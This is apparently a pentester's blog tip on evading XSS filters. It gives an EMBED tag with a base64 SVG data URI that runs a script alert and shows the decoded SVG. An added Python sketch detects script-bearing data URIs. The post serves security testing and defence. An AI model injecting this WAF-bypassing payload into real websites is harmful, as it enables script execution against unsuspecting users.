# Week 1 - XSS Filter Evasion

## Advanced XSS using \<embed>

To start off the new year, I’ll be kicking off a series of posts containing Web App Hacking Tips & Tricks. This week’s tip is related to Advanced Cross-Site Scripting:

Several times in the past, I’ve found myself testing a website that allows HTML Injection, but I can’t seem to get a working XSS payload or pop an alert box. Typically, the application has some kind of WAF running that blocks specific HTML tags (script, img, a) or more commonly HTML events (onclick, onerror, onpageshow). In these situations, I’ve found the below payload successfully executes:

`<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>`

The above base64 decodes to:

`<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss"><script type="text/ecmascript">alert("XSS");</script></svg>`

{% hint style="info" %}
Because this payload doesn’t contain HTML events and uses the uncommon \<embed> tag, it is a useful addition to your pentesting notes.
{% endhint %}
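
Seen from the filter's side, the payload passes because the `<script>` element only exists after the `data:` URI is base64-decoded. The following added example (not part of the original post) is a Python sketch of a check that decodes `data:` URIs in `src`, `data` and `href` attributes before looking for script markers; the attribute list, the marker regex and the sample inputs are assumptions constructed for illustration.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote_to_bytes

URL_ATTRS = {"src", "data", "href"}  # attributes checked (assumed list)
# Heuristic markers of script-capable content in the decoded body.
ACTIVE_MARKUP = re.compile(rb"<\s*script|\bon\w+\s*=|javascript:", re.I)

def decode_data_uri(value):
    """Return (media_type, body_bytes) for a data: URI, else None."""
    m = re.match(r"\s*data:([^,]*),(.*)", value, re.I | re.S)
    if not m:
        return None
    params = [p.strip().lower() for p in m.group(1).split(";")]
    media_type = params[0] or "text/plain"
    body = unquote_to_bytes(m.group(2))  # undo percent-encoding first
    if "base64" in params[1:]:
        # Whitespace inside the base64 is tolerated by forgiving decoders,
        # so strip it and restore padding before decoding.
        compact = re.sub(rb"\s+", b"", body)
        compact += b"=" * (-len(compact) % 4)
        try:
            body = base64.b64decode(compact)
        except ValueError:
            body = b""  # undecodable payload: nothing to inspect
    return media_type, body

class DataUriScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):  # names arrive lowercased
        for name, value in attrs:
            decoded = decode_data_uri(value) if name in URL_ATTRS and value else None
            if decoded and ACTIVE_MARKUP.search(decoded[1]):
                self.findings.append((tag, name, decoded[0]))

def scan(html):
    """Return (tag, attribute, media_type) for each data: URI carrying script markers."""
    scanner = DataUriScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed samples (not taken from the page).
SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>'
B64 = base64.b64encode(SVG).decode()
SAMPLE_ACTIVE = f'<EMBED SRC="data:image/svg+xml;base64,{B64[:20]} {B64[20:]}" type="image/svg+xml">'
SAMPLE_BENIGN = '<img src="data:image/png;base64,iVBORw0KGgo=">'
```

A filter that matches tag and event names only on the raw request never sees the decoded body, which is why the check runs after decoding and after tag and attribute names are normalised to lowercase.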


